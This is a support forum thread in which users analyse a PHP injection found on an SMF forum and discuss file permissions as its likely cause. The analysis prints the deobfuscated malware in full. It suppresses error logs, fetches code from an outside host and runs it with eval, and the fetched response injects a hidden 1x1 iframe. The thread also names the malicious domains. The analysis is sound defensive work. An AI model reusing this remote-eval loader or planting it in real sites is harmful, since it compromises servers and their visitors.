SMF Support > SMF 2.0.x Support
base64 hack
gamesmad:
This reply attempts to assess what this attack is actually doing, and as such contains links to bad sites that could (and probably do) contain malware. Do not click the links unless you know what you are doing. I am not responsible for any problems you may have.
The code can be unscrambled to this -
--- Code: ---<?php
/*68066*/
error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors','Off');
error_reporting(0);
set_time_limit(0);
$z37="stats";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac", "inux", "X11");
if(
(preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_SERVER["HTTP_REFERER"]) ==0) or (isset($_SERVER["HTTP_COOKIE"])) or (isset($_SERVER["HTTP_USER_AGENT"]) ==0)) {
} else {
@setcookie($z37,md5("stats"),time()+172800);
$url = "http://4040ent.com/session.php?id";
$iframe=@eval(file_get_contents ($url));
if ($iframe) echo($iframe);
}
/*68066*/
?>
<?php
// Try to handle it with the upper level index.php. (it should know what to do.)
if (file_exists(dirname(dirname(__FILE__)) . '/index.php'))
include (dirname(dirname(__FILE__)) . '/index.php');
else
exit;
?>
--- End code ---
I'll now try and break it down but this is only my best guess so if anyone else knows better then please correct me. Explanations are just above each code snippet.
This looks like a unique reference, so that the attacker can track which hacks have worked and which haven't.
--- Code: ---/*68066*/
--- End code ---
This section is turning off visual error reporting, and also error logging, an attempt to avoid detection I assume.
--- Code: ---error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors','Off');
error_reporting(0);
set_time_limit(0);
--- End code ---
Here there are a couple of variables being setup. $_SERVER["HTTP_USER_AGENT"] is a PHP variable that (in simple terms) contains the name of the browser that is being used to view the page.
For example "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13" would be the value if you were using Google Chrome on Windows XP.
Importantly, Google and other search engines will set this value to make it clear it was them visiting, for example "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" is Googlebot.
This brings us on to the array, which seems to list search engines.
--- Code: ---$z37="stats";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac", "inux", "X11");
--- End code ---
This bit is quite complicated, but basically it is checking whether the page visitor is a search engine or not. If the visitor is a search engine then it displays the contents of the page "http://4040ent.com/session.php?id", which is -
--- Code: ---<iframe src="http://directs39.in/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>
--- End code ---
Which is a 1 x 1 iframe of the page http://directs39.in/in.cgi?55764.
It also sets a cookie called "stats".
--- Code: ---if(
(preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_SERVER["HTTP_REFERER"]) ==0) or (isset($_SERVER["HTTP_COOKIE"])) or (isset($_SERVER["HTTP_USER_AGENT"]) ==0)) {
} else {
@setcookie($z37,md5("stats"),time()+172800);
$url = "http://4040ent.com/session.php?id";
$iframe=@eval(file_get_contents ($url));
if ($iframe) echo($iframe);
}
--- End code ---
That seems to be where the trail runs out because visiting the page "http://directs39.in/in.cgi?55764" redirects to Google, however the attack is complicated so it could redirect to another site if the iframe is viewed from a site that has been attacked. As I said, this is where the trail runs out for me, but that is most likely due to my limited knowledge.
Visiting "http://directs39.in/" takes you to a page with 2 login options, one for a user, and one for bos (back office system?). The page title is "traffic index".
This may not seem like it's actually doing anything, however to me this looks like it is gaming search engines by having the ability to control the content that a search engine spider downloads (when visiting your website!), while the site appears unchanged to normal users. It is a hack to get backlinks to a site. There is certainly more to it than I have covered here, probably tracking to pick up the cookie and something to control what is displayed instead of the "real" content, but I am stuck in terms of digging any deeper.
Put simply, you need to remove it from your sites.
Krash.:
That's pretty much consistent with what we had. Forum was unaffected, nothing unusual in error log, no spam or redirects, users were just getting security alerts.
Is this an SMF vulnerability, or poor host security?
Arantor:
Probably more the case that the files were left writable by the server itself, i.e. not the host's fault but the forum admin's fault for not securing the files after mods were installed - that's the reason for almost all of the 'I got hacked' reports here.
Krash.:
That's the other problem. When I look at this account in Filezilla, the permissions column is blank for all subdirs and files, right up to the root. Checking individual file permissions, I see 'xxx'. If I reset to 644 or 755, it doesn't change. Same thing if I upload a new file. Only happens on this account, my other GoDaddy forums display permissions normally.
Arantor:
Sounds to me as though permission changes are blocked on that server via FTP.
Navigation
[0] Message Index
[#] Next page
[*] Previous page
Go to full version